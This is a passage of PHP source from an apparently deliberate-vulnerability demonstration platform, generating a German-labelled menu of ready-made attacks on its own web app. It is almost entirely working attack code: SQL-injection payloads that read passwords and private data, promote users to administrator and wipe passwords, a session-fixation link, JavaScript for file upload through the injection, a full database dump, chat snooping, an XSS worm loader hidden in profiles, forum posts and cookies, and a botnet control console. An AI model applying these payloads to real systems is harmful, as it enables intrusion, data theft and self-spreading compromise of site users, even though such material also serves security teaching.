</li></ul><li><a class='wipe' href='$wiki/Session-ID'$tgb>Session-ID</a>-Angriffe durch <a class='wipe' href='$wiki/Session_Fixation'$tgb>Festlegung</a> und <a class='wipe' href='$wiki/Session_Hijacking'$tgb>Enführung</a><ul>
<li><a title='Diesen Link auf einen zweiten Browser aufrufen und beide Browser laufen mit der selben Session! (D.H. Es ist nicht erforderlich Anmeldedaten zu entwenden!)' href='$self?".session_name()."=".session_id()."'$atk>Session_Fixation</a>
</li></ul><li><a class='wipe' href='$wiki/SQL-Injection'$tgb>SQL-Injection</a> (Sicherheitslücke in der <a href='$self/Profil?id=-1'$sel>Profilanzeige</a> - zum Daten auslesen)<ul>
<li><a title='Einen beliebigen Text als Benutzerprofil ausgeben!' href='$self/Profil?id=".str_replace(' ','+',<<<eof
-1 union select $sij[1]"SQL-Injection" as username,$sij[2]" Hello World!" as profil
eof
)."' onClick='this.href=this.href.replace(/\+(\w+\+\+[\w!]+)/,prompt(\"Bitte geben Sie einen Text ein!\",\"Hello World!\"))'$atk>Hello World!</a>
<li><a title='Einen beliebigen Werbebanner als Benutzerprofil ausgeben!' href='$self/Profil?id=".urlencode(str_replace('//','//',strtr(<<<eof
-1 union select $sij[1]"Werbung" as username,$sij[2]"<center><a href='_hlink_'$tgb onClick=this.href='_elink_'><img src=' _blink_' alt='Werbung' border='0'></a></center>" as profil
eof
,$attack)))."' onClick='this.href=this.href.replace(/\+http[^+]+(?=%\w+\+)/,encodeURIComponent(prompt(\"Bitte geben Sie eine Banner-URL ein!\",\"$attack[_blink_]\")))'$atk>Werbebanner</a>".((substr($attack['_blink_'],0,1) == '/') ? '' : $var[1])."
<li><a title='".($k = 'Eine beliebige Webseite als Benutzerprofil ausgeben!')."' href='$self/Profil?id=".urlencode(strtr("-1 union select $sij[1]'".($a = '_glink_ ')."' as username,$sij[2]\"".($v = "<center><iframe src='_glink_ ' width='100%' height='400' frameborder='0'></iframe></center>")."\" as profil",$attack))."' onClick='this.href=this.href.replace(/(http[%\dA-F]+)[%\w.-\/]+\+(?=%27)/g,\"$1\"+prompt(\"Bitte geben Sie eine Ziel-Webseite ein!\",\"".str_replace('http://','',$attack['_glink_'])."\"))'$atk>Fremde Seite</a>".((substr($attack['_glink_'],0,1) == '/') ? '' : $var[1])." <small><a title='$k' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"".strtr("$a for Chrome",$attack)."\" as username,$sij[2]b64d(\"".base64_encode(strtr($v,$attack))."\") as profil")."'$atk><em>Chrome</em></a></small>
<li><a title='Einen beliebigen Select-Befehl ausführen!' href='$self/Profil?id=".str_replace(' ','+',<<<eof
-1 union select $sij[1]"SQL-Query" as username,$sij[2](SELECT username||" - "||password FROM user WHERE id=1) as profil
eof
)."' onClick='this.href=this.href.replace(/(SELECT.*?(?=\)))/,prompt(\"Bitte geben Sie einen Select-Befehl ein!\",\"select passhelp from user where id=1\"))'$atk>Select-Befehl ausführen</a>
<li><a title='Durch Eingabe eines CMS-Namen oder einer CMS-ID kann jede CMS-Seite aus der Datenbank als Benutzerprofil angezeigt werden. Unabhängig davon, ob die Seite Öffendlich, für Benutzer oder noch gesperrt sind!' href='$self/Profil?id=".urlencode(<<<eof
-1 union select $sij[1]ifnull(name,'Startseite')||' - '||ifnull(description,'Keine Beschreibung') as username,$sij[2]content as profil from cms where id=' 1' or name like ' 1'
eof
)."' onClick='this.href=this.href.replace(/\+1/g,prompt(\"Geben Sie eine CMS-ID ein!\",1))'$atk>Jede CMS-Seite anzeigen</a>
<li><a title='Durch Eingabe eines Dateinamen oder einer Datei-ID kann jeder Datei-Upload aus der Datenbank im Benutzerprofil angezeigt werden. Unabhängig davon, ob der Upload Öffendlich, für Benutzer oder gesperrt ist!' href='$self/Profil?id=".urlencode(<<<eof
-1 union select $sij[1]name||" - "||size||" Bytes - "||info as username,$sij[2]"<iframe src='data:"||type||";base64,"||data||"' width='100%' height='400'></iframe>" as profil from file where id=' 1' or name like ' 1'
eof
)."' onClick='this.href=this.href.replace(/\+1/g,prompt(\"Geben Sie einen Dateinamen oder eine Datei-ID ein!\",1))'$atk>Jeden Datei-Upload anzeigen</a>
<li><a title='Durch Eingabe einer Betrags-ID kann jeder Betrag aus der Datenbank als Benutzerprofil angezeigt werden. Unabhängig davon, ob der Beitrag Öffendlich, Privat oder gesperrt wurde!' href='$self/Profil?id=".urlencode(<<<eof
-1 union select $sij[1]ifnull(title,'Ohne Titel')||' ('||f.[create]||' - '||ifnull(u.username,'Unbekannt')||ifnull(' an: '||t.username,'')||')' as username,$sij[2]message as profil from forum as f left join user as u on u.id=f.userid left join user as t on t.id=f.mailid where f.id= 1
eof
)."' onClick='this.href=this.href.replace(/\+1/g,prompt(\"Geben Sie eine Beitrags-ID ein!\",1))'$atk>Jeden Forum/Mail-Eintrag anzeigen</a>
<li><a title='Durch Eingabe eines Benutzernamens oder Benutzer-ID können alle gespeicherten Daten vom entsprechenden Benutzer aus der Datenbank als Benutzerprofil angezeigt werden!' href='$self/Profil?id=".urlencode(strtr(<<<eof
-1 union select $sij[1]"Userdata" as username,$sij[2](select
"<code> ID: "||ifnull(id,"")||"\\\\
Erstellt:"||ifnull([create],"")||"\\\\
Geändert:"||ifnull(change,"")||" ("||ifnull(changes,"")||")\\\\
Logins: "||ifnull(logins,"")||"\\\\
Requests:"||ifnull(requests,"")||"\\\\
Status: "||ifnull(status,"")||"\\\\
IP: "||ifnull(ip,"")||"\\\\
Session: "||ifnull(session,"")||"\\\\
Browser: "||ifnull(useragent,"")||"\\\\
Benutzer:"||ifnull(username,"")||"\\\\
Kennwort:"||ifnull(password,"")||"\\\\
Antwort: "||ifnull(passhelp,"")||"\\\\
Vorname: "||ifnull(forename,"")||"\\\\
Nachname:"||ifnull(lastname,"")||"\\\\
eMail: "||ifnull(mail,"")||"\\\\
Homepage:"||ifnull(page,"")||"\\\\
Screen: "||ifnull(info,"")||"\\\\
Stadt: "||ifnull(town,"")||"\\\\
Geborn: "||ifnull(born,"")||"\\\\
Tagline: "||ifnull(tagline,"")||"\\\\
Profil:</code><br>"||ifnull(profil,"") from user where id= 1 or username like 1 ) as profil
eof
,"\t",""))."' onClick='this.href=this.href.replace(/\+1\+/g,String.fromCharCode(39)+prompt(\"Geben Sie eine User-ID oder einen Username ein!\",1)+String.fromCharCode(39))'$atk>Fremde Benutzerdaten anzeigen</a>
</li></ul><li><a class='wipe' href='$wiki/SQL-Injection#Blinde_SQL-Injection'$tgb>SQL-Injection</a> (Sicherheitslücke beim <a href='$self/Abmelden?id=-1'$sel>Abmelden</a> - für Daten Änderungen)<ul>
<li><a title='Für alle Benutzer wird das Status-Feld auf Abgemeldet gesetzt' href='$self/Abmelden?id=".urlencode(<<<eof
-1;update user set status=status&254
eof
)."'$atk>Alle Benutzer Abmelden</a>
<li><a title='Durch Eingabe eines Benutzernamens oder Benutzer-ID kann der entsprechende Benutzer als Administrator hochgestuft werden. Unabhängig davon, ob der Benutzer gesperrt war!' href='$self/Abmelden?id=".urlencode(<<<eof
-1;update user set status=ifnull(status,0)%2+2 where id= 1 or username like 1
eof
)."' onClick='this.href=this.href.replace(/(\+1)/g,String.fromCharCode(39)+prompt(\"Geben Sie eine User-ID oder einen Username ein!\",1)+String.fromCharCode(39))'$atk>Benutzerhochstufung zum Admin</a>
<li><a title='Durch Eingabe eines Benutzernamens oder Benutzer-ID kann das persöhnliche Kennwort des entsprechenden Benutzers gelöscht werden!' href='$self/Abmelden?id=".urlencode(<<<eof
-1;update user set password='' where id= 1 or username like 1
eof
)."' onClick='this.href=this.href.replace(/(\+1)/g,String.fromCharCode(39)+prompt(\"Geben Sie eine User-ID oder einen Username ein!\",1)+String.fromCharCode(39))'$atk>Benutzerkennwort entfernen</a>
</li></ul><li><a class='wipe' href='$wiki/SQL-Injection'$tgb>SQL-Injection</a> & <a class='wipe' href='$wiki/Cross-Site-Scripting'$tgb>Cross-Site-Scripting</a> (Sicherheitslücken Kombinieren)<ul>
<li><a title='Hier kann ein beliebiger Inhalt als Benutzerprofil ausgegeben werden! - (Ein Hack, der einen Benutzerdefinierten Hack Generiert!)' href='$self/Profil?id=".urlencode(preg_replace($js,'',<<<eof
-1 union select $sij[1]"SQL-Injection Construction Set" as username,$sij[2]"Enter what you want!<form name='hack' onsubmit='
location.href = location.href.replace(/SQL.*?Set/,encodeURIComponent(document.hack.user.value)).replace(/Enter.*(?=%22\+as\+profil)/,encodeURIComponent(document.hack.profil.value));
return false;
'>User:<br><input type='text' name='user' style='width:100%'><br>Profile:<br><textarea name='profil' style='width:100%'></textarea><br><input type='submit'></form>" as profil
eof
))."'$atk>Construction Set für das Profil</a> <small>(Nur Anzeige)</small>
<li><a title='".($k = 'Hier kann ein beliebiger Beitrag in das Forum geschrieben werden. Unabhängig davon, ob man Benutzer im Forum ist oder nicht!')."' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"".($a = "Forum/Mail Message")."\" as username,$sij[2]\"".($v = preg_replace($js,'',"Enter what you want!<form name='hack' onsubmit='location.href=echo();return false;'><table><tr><td width='99%'>Title:<br><input type='text' name='title' style='width:100%'></td><td>UserID:<br><input type='text' name='mail' size='1'></td></tr>
<tr><td colspan='2'>Message:<br><textarea name='message' style='width:100%'></textarea><br><input type='submit'></td></tr></table></form><script>
function echo() {
x = document.hack;
return location.pathname.replace('Profil','Abmelden') + ('?id="
.urlencode("-1;insert into forum([create],change,ip,mailid,title,message)values(datetime('now','localtime'),datetime('now','localtime'),0,nullif('_1_',''),nullif('_2_',''),'_3_')")
."') .replace(/_1_/,encodeURIComponent(x.mail.value))
.replace(/_2_/,encodeURIComponent(x.title.value))
.replace(/_3_/,encodeURIComponent(x.message.value));
}
</script>"))."\" as profil")."'$atk>Beliebige Einträge in das Forum</a> - <small><a title='$k' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"$a for Chrome\" as username,$sij[2]b64d(\"".base64_encode($v)."\") as profil")."'$atk><em>Chrome</em></a> (Dauerhaft)</small>
<li><a title='".($k = 'Hier kann eine neue Seite erstellt werden, die dauerhaft bestehen bleibt!')."' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"".($a = "SQL-Injection Construction Set (CMS)")."\" as username,$sij[2]\"".($v = "Enter what you want!<form name='c' onsubmit='location.href=echo();return false;'><table width='100%'><tr><td width='20%'>Name:<br><input type='text' name='n' style='width:100%'></td><td width='79%'>Info:<br><input type='text' name='i' style='width:100%'></td><td>Status:<br><input type='text' name='s' value='0' size='2'></td></tr></table>Content:<br><textarea name='c' style='width:100%'></textarea><br><input type='submit'></form><script>".preg_replace($js,'',"
function echo() {
c = document.c;
return location.pathname.replace('Profil','Abmelden') + ('?id="
.urlencode("-1;insert into cms([create],change,status,name,description,content)values(datetime('now','localtime'),datetime('now','localtime'),nullif('_1_',''),'_2_',nullif('_3_',''),nullif('_4_',''))")."')
.replace(/_1_/,c.s.value.replace(/\D+/g,''))
.replace(/_2_/,encodeURIComponent(c.n.value))
.replace(/_3_/,encodeURIComponent(c.i.value))
.replace(/_4_/,encodeURIComponent(c.c.value));
}
</script>"))."\" as profil")."'$atk>Beliebige Seiten im CMS anlegen</a> - <small><a title='$k' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"$a for Chrome\" as username,$sij[2]b64d(\"".base64_encode($v)."\") as profil")."'$atk><em>Chrome</em></a> (Dauerhaft)</small>
<li><a title='".($k = 'Hier können beliebige Dateien hochgeladen werden!')."' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"".($a = "File-Upload over SQL-Injection".($b = preg_replace($js,'',"<script>
try { // Die Rückkanalmethode festlegen
var A = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
A = new ActiveXObject('Microsoft.XMLHTTP');
}
function query(q) { // SQL-Query durch die SQL-Injection-Lücke (Profil) schicken
if(A) {
A.open('GET',location.pathname.replace(/(\.php\d*)(\/\w+)?$/,'$1/'+((x = q.match(/^\s*select/i))
? 'Profil?id=-1+union+select+$sij[1](' + encodeURIComponent(q) + ')+as+username,$sij[2]0+as+profil'
: 'Abmelden?id=-1;' + encodeURIComponent(q)) + '&' + new Date().getTime()),false);
A.send(''); // Absenden
q = [q,((q = A.responseText.match(/<fieldset\sclass='cr'><legend>Profil\svon\s<b>([^\\0]*)<\/b><\/legend>(?:<div.*?<\/div)?<div\sid='profil'>0<\/div><\/fieldset>|(<b>Warning<\/b>[^\\0]*?)<!DOCTYPE/)))
? ((q[1] != '' && !q[2]) ? q[1] : ((q[2]) ? q[2].replace(/<[^>]*>/g,'') : '')) : ((x) ? false : '')]; // Ergebnis, Fehler oder nichts zurückgeben
if(typeof jsdebug == 'function') // Wurm-Requests Debuggen
jsdebug(q[0] + '\\x20->\\x20' + q[1]);
return q[1];
}
return false;
}</script>"))."<script>".preg_replace($js,'',"
function send(u) {
if((x = u.target.files[0])) {
y = new FileReader();
y.onload = function(v) {
for(a = b = c = 0, d = '', e = v.target.result, f = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'; a < e.length; )
for(c = (c << 8) + e.charCodeAt(a++), b += 8; b >= 6; )
d += f[c >> (b -= 6)],
c %= 1 << b;
if(b)
d += f[c << 6 - b];
query('insert into file([create],user,name,ip,info,size,type,data)values(datetime(\'now\',\'localtime\'),0,\'' + (c = (z.n.value) ? z.n.value : x.name) + '\',0,nullif(\'' + z.i.value + '\',\'\'),' + x.size + ',\'' + ((z.t.value) ? z.t.value : x.type) + '\',\'\')');
a = query('select max(id) from file');
b = 0;
while(b < d.length) {
query('update file set data = data||\'' + d.substr(b,parseInt(z.s.value)) + '\' where id = ' + a);
b += parseInt(z.s.value);
document.getElementById('fstat').innerHTML = Math.min(Math.round(b / d.length * 100),100) + '%';
}
alert('File Uploaded!\\n\\nLink:\\n' + document.getElementById('furl').firstChild.nodeValue + c)
};
y.readAsBinaryString(x);
}
}
</script>"))."\" as username,$sij[2]\"".($v = "Upload what you want! - **Download:** <span id='furl'>::f/0-</span>//filename// <span id='fstat'></span><form name='up'><table width='100%'><tr><td width='80%' colspan='2'>Filename: (Optional)<br><input type='text' name='n' style='width:100%'></td><td width='20%'>Content-Type: (Optional)<br><input type='text' name='t' style='width:100%'></td><tr><tr><td width='75%'>Description: (Optional)<br><input type='text' name='i' style='width:100%'></td><td width='5%'>Step:<br><input type='text' name='s' size='4' maxlength='4' value='4096'></td><td width='20%'>File Selection & Uploadstart:<br><input type='file' name='f' id='f'></td></tr></table></form><script>z=document.up;z.f.addEventListener('change',send,false);</script>")."\" as profil")."'$atk>Dateien in die Datenbank hochladen</a> <small><a href='$self/Profil?id=".urlencode("-1 union select $sij[1]b64d('".base64_encode("$a for Chrome")."') as username,$sij[2]b64d('".base64_encode($v)."') as profil")."' title='$k'$atk><em>Chrome</em></a> (Dauerhaft)</small>
<li><a title='".($k = 'Hier können beliebige SQLite-Abfragen gemacht werden. (Es wird automatisch die entsprechende SQL-Lücke für den Befehl im Hintergrund ausgenutzt!)')."' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"SQLeak-Konsole$b\" as username,$sij[2]\"".($a = "<form name='leak'><textarea id='sqlquery' cols='80' rows='6' style='width:100%'></textarea><br><textarea id='result' cols='80' rows='6' style='width:100%' readonly></textarea><br><input type='button' value='Execute Query' onclick=y=document.leak;y.result.value='working...';y.result.value=query(y.sqlquery.value)> <input type='reset'></form><script>document.leak.sqlquery.focus()</script>")."\" as profil")."'$atk>SQLeak-Konsole</a> - <small><a href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"SQLeak-Console for Chrome\"||b64d('".base64_encode($b)."') as username,$sij[2]b64d('".base64_encode($a)."') as profil")."' title='$k'$atk><em>Chrome</em></a> (Einspaltige abfragen oder beliebige Änderungen)</small>
<li><a title='".($k = 'Hier können alle Chat-Mitteilungen in echtzeit mitgelesen werden')."' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"Chat-Monitor".($v = preg_replace($js,'',preg_replace('|(?=</script>$)|',<<<eof
function cl() {
c = [document.getElementById('clout'),document.cc];
if((y = c[1].id.value) == 0)
c[0].innerHTML = '';
while((b = 0) || (a = query('select (select max(id) from chat)||\',\'||ifnull((
select c.id||\',\'||c.chat||\',\'||c.user||\',\'||u.username||\',\'||strftime(\'%s\',c.time)||\',\'||c.text
from chat as c
left join user as u on u.id = c.user
where c.id > ' + y + '\\x20
limit 1),0)')) && (b = a.match(/^(\d+),(?:\d|([\d-]+),([\d-]+),(\d+),([^,]+),(\d+),([^\\0]*))?$/)) && b[2]) {
c[2] = c[1].key.value;
while(d = c[2].match(/^(\w{32})(?=\W+|$)/)) {
c[2] = c[2].replace(/^\w+\W*/,''),
c[3] = d[1];
try {
if(CryptoJS && (d = b[7].match(/^(\w+)\/([\w\/+]+=*)$/)) && (c[4] = CryptoJS.AES.decrypt(d[2],c[3])) && (c[4] = c[4].toString(CryptoJS.enc.Utf8)) && CryptoJS.MD5(c[3] + ',' + c[4]) == d[1])
b[7] = c[4],
c[2] = '';
}
catch(e) {
jsdebug(e);
}
}
(a = document.createElement('p')).innerHTML = '<fieldset style=\'word-break:break-all\'><legend title=\'' + b[2] + '\'><b>' + b[5] + '</b> <small>{' + b[4] + '} (' + (new Date(b[6]*1000).toLocaleString()) + ')</small>' + ' [' + b[3] + ']<\/legend>' + b[7].replace(/</g,'<').replace(/>/g,'>') + '<\/fieldset>';
c[0].appendChild(a);
c[0].scrollTop = c[0].scrollHeight;
y = b[2];
}
c[1].id.value = (b && b[1]) ? b[1] : y;
setTimeout('cl()',10 * 1000);
};
function sm(y) {
b = y.send.value;
if(CryptoJS && (c = y.key.value.match(/\W*(\w{32})(?=\W+|$)/)))
b = (CryptoJS.MD5(c[1] + ',' + b) + '/' + CryptoJS.AES.encrypt(b,c[1]).toString() + '=').replace(/=(?==$)/,'');
query('insert into chat (time,chat,user,text) values (datetime(\'now\',\'localtime\'),' + y.chat.value + ',' + y.user.value + ',\'' + b + '\')');
y.send.value = '';
return false;
};
setTimeout('cl()',500);
eof
,$b))."<script src='{$jschat['crypt']['aes']}'></script>")."\" as username,$sij[2]\"".($a = "<form action='#' name='cc' onsubmit='return sm(this)'><div id='clout' style='width:100%;height:400;overflow-x:auto;overflow-y:auto'></div><table width='100%'><tr><td width='99%'>Send Message:<br><input type='text' name='send' style='width:100%'></td><td>Key:<br><input type='text' name='key' size='32' onchange='document.cc.id.value=0'></td><td>Chat:<br><input type='text' name='chat' size='3' value='0'></td><td>User:<br><input type='text' name='user' size='3' value='0'></td><td nowrap>Control:<br><input type='text' name='id' size='3' value='0'><input type='submit'></td></tr></table></form>")."\" as profil")."'$atk>Chat-Monitor</a> - <small><a href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"Chat-Monitor for Chrome\"||b64d('".base64_encode($v)."') as username,$sij[2]b64d('".base64_encode($a)."') as profil")."' title='$k'$atk><em>Chrome</em></a> (Zeigt den aktuellen Chatverlauf aller Benutzer an)</small>
<li><a title='".($k = 'Hier kann die komplette Datenbank als SQL-Dump ausgelesen werden!')."' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"DB-Leak".($v = preg_replace(array('!(?=</)!',$js),array("function leakdatabase() {
e = document.leak;
f = e.sqldump;
f.value = '',
t = query('select count(*) from $sql[m] where type=\'table\''); // Anzahl der Tabellen in der Datenbank
if(t.match(/^\d+$/)) {
for(a=0;a < t;a++) {
c = query('select sql from $sql[m] where type=\'table\' limit ' + a + ',1'); // Tabellen Struktur auslesen
f.value += (e.create.checked) ? c.replace(/^([^\\0]*)$/,'/* \\$1; */\\n') : c + ';\\n';
if((m = c.match(/create table\s*(\[?.*?\]?)\s*\(\s*([^\\0]*)\s*\)\s*;?\s*$/i))) { // Tabellennamen erkennen
n = m[1],
c = m[2].replace(/\s*,\s*/g,'\\n').match(/^\s*\[?[^\]\s]+\]?/gm); // Tabellenspalten erkennen
for(b=0;b < c.length;b++)
c[b] = c[b].replace(/[\\x00-\\x20]/g,''); // Spaltennamen säubern
l = query('select count(*) from ' + n); // Größe der Tabellen ermitteln
if(l.match(/^\d+$/)) {
for(b=0;b < l;b++) { // Daten aus den Tabellen holen
f.value += 'insert into ' + n + ' (' + c.join(',') + ') values (' + query('select quote(' + c.join(')||\',\'||quote(') + ') from ' + n + ' limit ' + b + ',1') + ');\\n';
f.scrollTop = f.scrollHeight;
}
}
}
}
}
}",''),$b))."\" as username,$sij[2]\"".($a = "<form name='leak'><textarea id='sqldump' cols='80' rows='25' style='width:100%' readonly></textarea><br><input type='button' value='Reading Database' onclick='leakdatabase()'> <input type='checkbox' name='create'>'Create Table' impersonate Comment</form>")."\" as profil")."'$atk>DB-Leak</a> - <small><a href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"DB-Leak for Chrome\"||b64d('".base64_encode($v)."') as username,$sij[2]b64d('".base64_encode($a)."') as profil")."' title='$k'$atk><em>Chrome</em></a> (Komplette Datenbank als SQL-Dump auslesen)</small>
</li></ul><li><a class='wipe' href='$wiki/Computerwurm'$tgb>XSS-Wurm</a> mit <a class='wipe' href='$wiki/Cross-Site-Scripting'$tgb>Cross-Site-Scripting</a> in der <a href='$self/Profil?id=-1'$sel>Profilanzeige</a> <small>(<a href='$self/SQL?worm'$rel$sel>Daten vom Wurm</a>)</small><ul>
<li><a title='Quelltext des Wurms!' href='$self/Worm.txt'$sel>XSS-BotWurm</a> in der <a title='$var[0] Den Wurm ausführen!' href='$self/Suche?q=%3cscript+src=\"$self/worm.js\"%3e%3c/script%3e'$atk>Suche</a> /
<a title='Den Wurm als Benutzerprofil ausgeben!' href='$self/Profil?id=".urlencode("-1 union select $sij[1]'Wurm' as username,$sij[2]'//Ich glaube - hier ist der [[^Worm.txt|Wurm]] drin...// 8O ~~ <script src=\"$self/worm.js\"></script>' as profil")."'$atk>Profil</a> <small>(Anzeige)</small> /
<a title='Den Wurm als Beitrag in das Forum setzen!' href='$self/Abmelden?id=".urlencode("-1;insert into forum ([create],change,ip,message) values (datetime('now','localtime'),datetime('now','localtime'),0,'//Ich glaube - hier ist der [[^Worm.txt|Wurm]] drin...// 8O ~~ <script src=\"$self/worm.js\"></script>')")."'$atk>Forum</a> /
<a title='Einen Wurm-Loader in einen Login-Cookie verstecken!' href='$self/Suche?q=".urlencode("<script>document.cookie='username=".urlencode("\"><script type=\"text/javascript\" src=\"$self/worm.js\"></script><input type=\"hidden")."'</script>")."'$atk>Cookie</a> <small>(Dauerhaft)</small>
<li><a title='Quelltext des einfachen Wurms!' href='$self/Wormy.txt'$sel>XSS-Mini-Wurm</a> im <a title='Den einfachen Wurm in das Benutzerprofil ausgeben!' href='$self/Profil?id=".urlencode("-1 union select $sij[1]'Wurmy' as username,$sij[2]'<script src=\"$self/wormy.js\"></script>' as profil")."' onClick='this.href=this.href.replace(/(wormy)/,\"\$1?~\"+prompt(\"Bitte die Url für eine Blinde-Webseite eingeben!\",\"$attack[_elink_]\"))'$atk>Benutzerprofil</a> <small>(Verbreitet sich mit blinder Webseite)</small>
<li><a title='Quelltext des Tagline-Wurms!' href='$self/Wormline.txt'$sel>XSS-Tagline-Wurm</a> im <a title='Mini-Wurm das Tagline des aktuellen Benutzers installieren!' href='$self/Profil?tl=".urlencode("Worminside!".str_pad("",80,"\t").preg_replace($js,'',$attack['_worm_']))."' onClick='this.href=this.href.replace(/=.*?(?=%09)/,\"=\"+prompt(\"Bitte geben Sie einen Text ein!\",\"Big trouble by a tiny Worm!\"))'$atk>Benutzerprofil</a> <small>(Kann sich nur mit Text Verbreiten)</small>
<li><a title='".($k = 'Befehle an Bot(s) schicken')."' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"Botnet".($v = preg_replace($js,'',preg_replace('|(?=</script>$)|',<<<eof
function cc(y) {
z = document.bn; // Kürzel für das CC-Formular
if(y > 0) {
z.op.value += new Date().toLocaleString() + ' [' + z.cid.value + '] @' + z.bid.value + ' ' + z.bo[z.bo.selectedIndex].label + '\\n';
query('replace into chat (id,chat,user,time,text) values (0,0,0,datetime(\'now\'),\'<!--807:' + ((y == 2) ? 9999 + (z.cid.value = 1) : z.cid.value++)
+ ',' + z.bid.value + ',' + z.ip.value.replace(/##var##/g,z.rpv.value).replace(/'/g,'\'\'') + '//-->\')');
z.op.scrollTop = z.op.scrollHeight; // Console runterscrollen
}
else if(z && !y) { // Status abfragen
do {
if((a = query('select (select count(*) from user where chat =\\t\'-0\')||\',\'||
(select count(*) from chat where chat =\\t\'-0\')||ifnull((
select \',\'||c.id||\',\'||user||\',\'||u.username||\',\'||datetime(time)||\',\'||text
from chat as c left join user as u on u.id = c.user where c.chat =\\t\'-0\'
order by c.id limit 1),\'\')')) && (b = a.match(/^(\d+),(\d+)(?:,(\d+),(\d+),([^,]+),([^,]+),([^\\0]*))$/))) {
query(((b[1]) ? 'update user set chat = null where chat =\\t\'-0\';' : '') // ChatCalls zurücksetzen
+ ((b[2]) ? 'delete from chat where id=' + b[3] : '')); // BotRückmeldungen löschen
if(b[2])
z.op.value += b[6] + ' ' + b[5] + '(' + b[4] + ')\\n' + b[7] + '\\n'; // Rückmeldungen ausgeben
z.op.scrollTop = z.op.scrollHeight; // Console runterscrollen
}
}
while(a && b && b[2] > 1);
}
if(!y)
setTimeout('cc(0)',((z && (a = parseInt(z.rf.value,10))) ? a : 10) * 1000); // Ein paar Sekunden warten
else if(y == -1) { // Eine Nachricht im Chat absetzen
if(z.cm.value.match(/^^\W*$/))
z.cm.value = '1,Welcome!' + unescape('%09%09%09<iframe style=%27display:none%27 src=%27$self?q=%252bw0rm%253cscript src=%2527$self/worm.js%2527><%2fscript>%27></iframe>');
if((a = prompt('Chat Message to all',z.cm.value))) {
z.cm.value = a;
if((a = a.match(/^(?:(\d+),)?(.*)$/)))
query('insert into chat (chat,user,time,text) values (0,' + ((a[1]) ? a[1] : 0) + ',datetime(\'now\'),\'' + a[2].replace(/'/g,'\'\'') + '\')');
}
}
else if(y == -2) // Alle Chat-Memos löschen
query('delete from chat where chat = 0');
else if(y == -3) {
query('delete from user where id = 0'); // Alle Spuren löschen
location.href = location.pathname;
}
};
function mh() { // Botnet-Angriffe einbetten
b = [],c=unescape('%22');
for(d=0;d<a.length;d+=2)
b.push('<option' + (a[d+1] ? ' value=' + c + a[d+1] + c : '') + (((e = a[d].split(',')) && e[1]) ?' title=\'' + e[1] + '\'' : '') + '>' + e[0] + '</option>');
return '<select name=\'bo\' onchange=\'
z = document.bn;
if(this.selectedIndex > 1) {
z.ip.value = this.value;
z.rpv.value = this[selectedIndex].title;
}\'>' + b.join('') + '</select>';
};
setTimeout('cc(0)',500);
query('replace into user (id,[create],change,status,chat,username,password,forename,lastname,mail) values (0,0,0,null,0,807,1337,808,57341,600613)');
a = 'Refresh,,Command [Custom],,Reset,W=0;R'.split(',');
eof
,$b)))."\" as username,$sij[2]\"".($a = "<script src='".((isset($attack['_bnlink_']) and $attack['_bnlink_']) ? $attack['_bnlink_'] : "$self/bnps")."'></script>".<<<eof
<form name='bn' onsubmit='cc(document.bn.bo.selectedIndex);return false'><input type='hidden' name='cm'><table border='1' width='100%'><tr><td>ID<br><input type='text' name='cid' size='3' value='1'></td><td>Bot_ID<br><input type='text' name='bid' size='3' value='0'></td><td>Refresh<br><input type='text' name='rf' size='3' value='10'></td><td width='99%'>Variable<br><input type='text' name='rpv' style='width:100%'></td><td nowrap>Command<br><script>document.write(mh())</script></td><td nowrap>Control<br><input type='submit'> <input type='button' value='Chat Memo' onclick='cc(-1)'></td><td nowrap>Reset<br><input type='reset'> <input type='button' value='Clear' onclick='(z=document.bn).op.value=z.ip.value=z.rpv.value=document.body.title'> <input type='button' value='CleanUp' onclick='cc(-2)'> <input type='button' value='Exit' onclick='cc(-3)'></td></tr><tr><td colspan='7'><textarea name='ip' rows='4' style='width:100%' onchange='document.bn.bo.selectedIndex=1'></textarea><br><textarea name='op' rows='16' style='width:100%' readonly></textarea></td></tr></table></form>
eof
)."\" as profil")."'$atk>Botnet Control-Center</a> - <small><a href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"Botnet for Chrome\"||b64d('".base64_encode($v)."') as username,$sij[2]b64d('".base64_encode($a)."') as profil")."' title='$k'$atk><em>Chrome</em></a> (Setzt Infizierte User mit XSS-Wurm voraus!)</small>
</li></ul><li><a class='wipe' href='http://en.wikipedia.org/wiki/Code_injection'$tgb>Code-Injection</a> (<a class='wipe' href='$wiki/SQL-Injection'$tgb>SQL-Injection</a> & <a class='wipe' href='$wiki/Cross-Site-Scripting'$tgb>XSS</a>) über die <a href='Creole'$sel>Creole-Formatierung</a>:<ul>
